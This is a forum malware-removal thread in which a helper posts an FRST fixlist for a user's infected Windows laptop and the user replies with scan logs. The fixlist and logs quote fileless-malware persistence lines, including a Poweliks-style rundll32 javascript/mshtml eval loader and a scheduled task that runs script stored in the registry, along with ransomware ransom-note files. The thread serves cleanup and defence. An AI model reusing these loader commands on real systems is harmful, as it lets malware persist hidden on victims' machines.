Error: (07/28/2015 03:27:51 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.20911c2801d0c96a6c9094da4294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exeb9e7cc70-355e-11e5-8187-2c59e5a5a8a3microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1
 
Error: (07/28/2015 03:20:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RICHIE)
Description: Microsoft.BingTravel_8wekyb3d8bbwe!AppexTravel-2144927148
 
Error: (07/28/2015 02:58:12 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: LiveComm.exe17.5.9600.20911a2c01d0c96649b3afff4294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe96c3afc4-355a-11e5-8187-2c59e5a5a8a3microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1
 
 
CodeIntegrity Error:
===================================
  Date: 2015-07-28 16:18:41.402
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-28 15:30:30.306
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-28 15:21:42.300
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-28 13:44:43.259
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-28 13:35:12.748
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-28 13:15:16.739
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-27 20:46:48.220
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-27 19:37:12.957
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-27 19:29:33.384
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
  Date: 2015-07-27 08:13:30.141
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\ProgramData\{9CAD18B2-FF9B-4CCA-8EE0-A4CDA3AD5F51}\dbghelp.dll that did not meet the Windows signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: AMD E-300 APU with Radeon™ HD Graphics
Percentage of memory in use: 34%
Total physical RAM: 3682.26 MB
Available physical RAM: 2398 MB
Total Virtual: 4386.26 MB
Available Virtual: 2443.11 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:273.49 GB) (Free:230.16 GB) NTFS ==>[system with boot components (obtained from reading drive)]
Drive d: (RECOVERY) (Fixed) (Total:23.39 GB) (Free:2.82 GB) NTFS ==>[system with boot components (obtained from reading drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 1E1F4777)
 
Partition: GPT Partition Type.
 
==================== End of log ============================
 

  • 0

Advertisements

#2
Pyxis
Posted 28 July 2015 - 11:32 PM

Pyxis

    Trusted Helper

  • Malware Removal
  • 1,228 posts
Greetings,

Welcome to Geeks to Go--the friendliest online community dedicated to the sole goal of helping people from all around the world! :) I am Pyxis and I will be assisting you. As such, I would like to stress the following reminders:
  • It is important that you do not install anything unless asked while the process is ongoing. Doing so may hinder or even complicate the cleaning of your system. You will get the chance to install things as you would like after the process has been completed.
  • Ensure you take extra caution to precisely follow my instructions. Please only use the tools I have asked you to. The instructions for your computer are unique and should therefore only apply to your system.
  • Since the cleaning process is quite delicate, your timely response is crucial. Topics are marked inactive and thus closed within 3 full days of no activity. If you deem I have overlooked your thread--which is in a matter of more than 48 hours--please send me a PM and I will get back to you shortly.
I hope you keep in mind these reminders. Let's get to work! :thumbsup:
  • Step 1

    Copy and paste the following into Notepad and save as fixlist.txt to your desktop:
    CloseProcesses:
EmptyTemp:

HKLM-x32\...\Run: [{b090579d-244c-e682-7cd6-e6daa5c7aff0}] => "C:\ProgramData\Microsoft\{b090579d-244c-e682-7cd6-e6daa5c7aff0}\{b090579d-244c-e682-7cd6-e6daa5c7aff0}.exe"
HKLM Group Policy restriction on software: C:\Program Files\Symantec <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Common Files\Symantec Shared <====== ATTENTION
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <===== ATTENTION
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\Run: [ivijios] => rundll32 "C:\Users\Richie\AppData\Local\ivijios.dll",ivijios <===== ATTENTION
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{eedc51b2-9627-4964-8aab-3c12119ef845} <======= ATTENTION (Policy restriction on IP)
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPNOT13/1
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPNOT13/1
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPNOT13/1
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPNOT13/1
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.co...&l=dis&o=HPNTDF
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPNTDF
SearchScopes: HKLM -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.co...54371-11896-2/4?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.co...&l=dis&o=HPNTDF
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPNTDF
SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.co...54371-11896-2/4?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/...q={searchTerms}
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/...q={searchTerms}
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.co...&l=dis&o=HPNTDF
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPNTDF
SearchScopes: HKU\S-1-5-21-2321640021-2341620851-140482586-1002 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.co...54371-11896-2/4?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
2015-07-17 10:59 - 2015-07-17 10:59 - 00266240 _____ C:\Users\Richie\AppData\Roaming\7afd7914.dll
2015-07-14 08:21 - 2015-07-20 08:35 - 00000000 ___HD C:\7afd7914
2015-07-13 15:33 - 2015-07-13 15:33 - 00000000 ____D C:\ProgramData\{18165758-115C-4DC0-9EC2-FF89F725767F}
2015-07-10 15:34 - 2015-07-28 13:17 - 00000000 ____D C:\Users\Richie\AppData\Local\{beedd195-7534-c93e-bcaf-0a2671d4725d}
2015-07-10 15:34 - 2015-07-10 15:34 - 00000000 ___HD C:\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}
2015-07-28 13:17 - 2014-12-06 22:56 - 00000000 ____D C:\ProgramData\LeboBukmo
2015-07-28 13:17 - 2014-11-26 00:56 - 00000000 ____D C:\Users\Richie\AppData\Roaming\FrameworkUpdate
2015-07-28 13:17 - 2014-11-21 00:32 - 00000000 ____D C:\ProgramData\IomuTdilf
2015-07-28 13:17 - 2014-11-11 19:24 - 00000000 ____D C:\Users\Richie\AppData\Roaming\FrameworkUpdate7
2015-07-28 13:17 - 2014-11-11 19:24 - 00000000 ____D C:\ProgramData\XesviPteyu
2015-07-28 13:17 - 2014-11-11 19:24 - 00000000 ____D C:\ProgramData\IojdOnyo
2015-07-28 13:17 - 2014-11-09 01:59 - 00000000 ____D C:\ProgramData\XiboHbik
2015-07-28 13:17 - 2014-11-09 01:59 - 00000000 ____D C:\ProgramData\EoxoKazxa
2015-07-28 13:17 - 2014-11-07 20:16 - 00000000 ____D C:\ProgramData\RogoLatk
2015-07-28 13:17 - 2014-11-07 20:15 - 00000000 ____D C:\ProgramData\BoweCpeb
2015-07-28 11:47 - 2014-11-05 01:20 - 00000000 ____D C:\ProgramData\HezagTonag
2015-07-10 14:50 - 2013-06-06 20:07 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Shopping and Services
2015-07-10 14:50 - 2012-08-17 14:05 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Security and Protection
2015-07-08 07:59 - 2014-12-13 10:58 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Ecidcuo
2015-07-08 07:59 - 2014-12-06 22:58 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Evcoguyl
2015-07-08 07:59 - 2014-11-21 00:33 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Urablax
2015-07-17 10:59 - 2015-07-17 10:59 - 0266240 _____ () C:\Users\Richie\AppData\Roaming\7afd7914.dll
2014-11-11 19:33 - 2014-11-11 19:33 - 0008516 _____ () C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-11-11 19:33 - 2014-11-11 19:33 - 0004198 _____ () C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-11-11 19:33 - 2014-11-11 19:33 - 0000268 _____ () C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.URL
2015-01-29 00:25 - 2015-01-29 00:25 - 0008528 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.HTML
2015-01-29 00:25 - 2015-01-29 00:25 - 0045533 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.PNG
2015-01-29 00:25 - 2015-01-29 00:25 - 0004204 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.TXT
2015-01-29 00:25 - 2015-01-29 00:25 - 0000272 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.URL
2014-11-11 19:24 - 2014-11-11 19:24 - 0000448 ____H () C:\Users\Richie\AppData\Roaming\麽鎒駓覜
2014-11-11 19:33 - 2014-11-11 19:33 - 0008516 _____ () C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-11-11 19:33 - 2014-11-11 19:33 - 0004198 _____ () C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-11-11 19:33 - 2014-11-11 19:33 - 0000268 _____ () C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.URL
2015-01-29 00:24 - 2015-01-29 00:24 - 0008528 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.HTML
2015-01-29 00:24 - 2015-01-29 00:24 - 0045533 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.PNG
2015-01-29 00:24 - 2015-01-29 00:24 - 0004204 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.TXT
2015-01-29 00:24 - 2015-01-29 00:24 - 0000272 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.URL
2014-11-11 19:24 - 2015-01-28 23:26 - 0000664 _____ () C:\ProgramData\@system.temp
2014-11-11 19:25 - 2015-01-28 23:27 - 0000400 ____H () C:\ProgramData\@system3.att
CustomCLSID: HKU\S-1-5-21-2321640021-2341620851-140482586-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
Task: {42606C78-3E7A-474E-9FB5-D30D039784CB} - System32\Tasks\GoogleUpdater => Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\internet explorer\\zergling_rush"))
Task: {F5715D4F-B262-4590-8487-ACEB028F19D5} - System32\Tasks\autochk => C:\Users\Richie\AppData\Roaming\Microsoft\Windows\IEUpdate\autochk.exe <==== ATTENTION
C:\users\richie\appdata\roaming\microsoft\windows\ieupdate
C:\users\richie\appdata\local\svcxdcl32.exe
HKLM\...\StartupApproved\Run32: => "{b090579d-244c-e682-7cd6-e6daa5c7aff0}"
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\StartupApproved\Run: => "{beedd195-7534-c93e-bcaf-0a2671d4725d}"
HKU\S-1-5-21-2321640021-2341620851-140482586-1002\...\StartupApproved\Run: => "Svc2dll"

RemoveProxy:
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
    • Run your copy of FRST. It is important to ensure it is located in your desktop.
    • Press the Fix button.
    • It will produce a log (fixlog.txt) once done.
    • Copy (CTRL + A and CTRL + C) and paste (CTRL + V) the content of the log in your next reply.
  • Step 2

    Open System Configuration by following the steps below.
    • Press the Windows and R buttons together. The Run prompt should appear.
    • Type in msconfig and press OK.
    • Navigate to the Startup tab > Enable All > Apply > OK.
    • You will be prompted to restart. Do not allow it by choosing Exit without restart.
  • Step 3

    Run your copy of FRST by double-clicking it.
    • Put a check on Addition.
    • Press the Scan button after.
    • It will produce FRST.txt and Addition.txt on your desktop once done.
    • Copy (CTRL + A and CTRL + C) and paste (CTRL + V) the content of the logs in your next reply.
  • Logs to Post

    In summary of the above, I will need you to post the following log(s):
    • Addition.txt (Farbar Recovery Scan Tool)
    • FRST.txt (Farbar Recovery Scan Tool)
    • fixlog.txt (Farbar Recovery Scan Tool)

  • 0

#3
smwifey
Posted 29 July 2015 - 06:55 PM

smwifey

    Member

  • Topic Starter
  • Member
  • PipPip
  • 85 posts

All steps completed and here are the logs.

 

Thanks for the help

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version:28-07-2015
Ran by Richie (2015-07-29 20:49:00)
Running from C:\Users\Richie\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-2321640021-2341620851-140482586-500 - Administrator - Disabled)
Guest (S-1-5-21-2321640021-2341620851-140482586-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2321640021-2341620851-140482586-1004 - Limited - Enabled)
Richie (S-1-5-21-2321640021-2341620851-140482586-1002 - Administrator - Enabled) => C:\Users\Richie
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Avira Antivirus (Enabled - Out of date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Out of date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
4 Elements II (x32 Version: 2.2.0.98 - WildTangent) Hidden
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.5.635 - Adobe Systems, Inc.)
AMD Catalyst Install Manager (HKLM\...\{63ADEC24-A374-80A8-E89B-BE401C787F75}) (Version: 8.0.881.0 - Advanced Micro Devices, Inc.)
AMD VISION Engine Control Center (HKLM-x32\...\WUCCCApp) (Version: 1.00.0000 - AMD)
Avira (HKLM-x32\...\{8467e01f-0496-42ce-b247-88ef205b4880}) (Version: 1.1.40.29239 - Avira Operations GmbH & Co. KG)
Avira (x32 Version: 1.1.40.29239 - Avira Operations GmbH & Co. KG) Hidden
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.12.408 - Avira Operations GmbH & Co. KG)
Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Build-a-lot 4 - Power Source (x32 Version: 2.2.0.98 - WildTangent) Hidden
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Cradle Of Egypt Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Cradle of Rome 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1.5407 - CyberLink Corp.)
CyberLink Media Suite 10 (HKLM-x32\...\InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}) (Version: 10.0.1.1916 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.1.1926 - CyberLink Corp.)
CyberLink PowerDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.6.4319 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.4.5527 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Energy Star (HKLM\...\{0FA995CC-C849-4755-B14B-5404CC75DC24}) (Version: 1.0.8 - Hewlett-Packard)
Farm Frenzy (x32 Version: 2.2.0.98 - WildTangent) Hidden
FATE: The Cursed King (x32 Version: 2.2.0.97 - WildTangent) Hidden
Final Drive Fury (x32 Version: 2.2.0.95 - WildTangent) Hidden
FlatOut 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 44.0.2403.107 - Google Inc.)
Google Update Helper (x32 Version: 1.3.28.1 - Google Inc.) Hidden
Governor of Poker 2 Premium Edition (x32 Version: 2.2.0.95 - WildTangent) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
Hoyle Card Games (x32 Version: 2.2.0.95 - WildTangent) Hidden
HP Documentation (HKLM-x32\...\{AE986BF5-B6E3-4F8D-B412-A3DD90DF5146}) (Version: 1.1.1.0 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.3.0 - WildTangent)
HP MyRoom (HKLM-x32\...\{9C35EDE5-4B0F-45E7-A438-314BA889948E}) (Version: 9.0.0.0 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{4ED7050C-9332-4FB2-AB07-E94F25A53D39}) (Version: 3.0.3 - Hewlett-Packard Company)
HP Registration Service (HKLM\...\{E4D6CCF2-0AAF-4B9C-9DE5-893EDC9B4BAA}) (Version: 1.0.5976.4186 - Hewlett-Packard)
HP Software Framework (HKLM-x32\...\{675D093B-815D-47FD-AB2C-192EC751E8E2}) (Version: 4.6.10.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{E35A3B13-78CD-4967-8AC8-AA9FDA693EDE}) (Version: 7.4.45.4 - Hewlett-Packard Company)
HP Utility Center (HKLM-x32\...\{0C57987A-A03A-4B95-A309-D23F78F406CA}) (Version: 1.0.7 - Hewlett-Packard)
HP Wireless Button Driver (HKLM-x32\...\{941DE69D-6CEE-4171-8F1F-3D7E352AA498}) (Version: 1.0.6.1 - Hewlett-Packard Company)
iscsicli (HKLM\...\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb) (Version:  - )
Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
John Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) Hidden
Luxor Evolved (x32 Version: 2.2.0.98 - WildTangent) Hidden
Mahjongg Dimensions Deluxe: Tiles in Time (x32 Version: 2.2.0.98 - WildTangent) Hidden
Malwarebytes Anti-Malware version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation)
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Mortimer Beckett and the Crimson Thief Premium Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Mystery P.I. - Curious Case of Counterfeit Cove (x32 Version: 2.2.0.98 - WildTangent) Hidden
Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden
Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden
Qualcomm Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 10.0 - Qualcomm Atheros)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.2.612.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6662 - Realtek Semiconductor Corp.)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.1.8400.29025 - Realtek Semiconductor Corp.)
Roads of Rome 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 16.6.1.3 - Synaptics Incorporated)
Tales of Lagoona (x32 Version: 2.2.0.110 - WildTangent) Hidden
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
Vacation Quest™ - Australia (x32 Version: 2.2.0.98 - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.3.0 - WildTangent)
WildTangent Games App (x32 Version: 4.0.9.6 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== Restore Points =========================
 
ATTENTION: System Restore is disabled
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 09:25 - 2013-08-22 09:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {21C0BD54-D728-412C-9687-5BD843CE459F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2014-05-12] (Hewlett-Packard Company)
Task: {4C2BD9C4-DC7D-49BA-9C3C-04F32D4276BD} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2012-07-27] (CyberLink)
Task: {79265C83-DBF1-4920-878D-0F9B507752FF} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2013-05-16] (Synaptics Incorporated)
Task: {9D9C2496-8F90-45D0-95F6-D62F07B68205} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {A7A6E087-4480-426A-A804-14A281739C8B} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2015-07-03] (Microsoft Corporation)
Task: {A82515B8-3006-4D3A-88A8-FE04D02C7192} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-27] (Google Inc.)
Task: {D40B0C6F-3A4C-4FBD-825B-B0A520FC47FB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {EBE40865-385F-454E-8EE7-98C98B1302B3} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-27] (Google Inc.)
Task: {F788831C-2C82-4174-8FBD-CE944B364117} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2012-06-07] (CyberLink)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
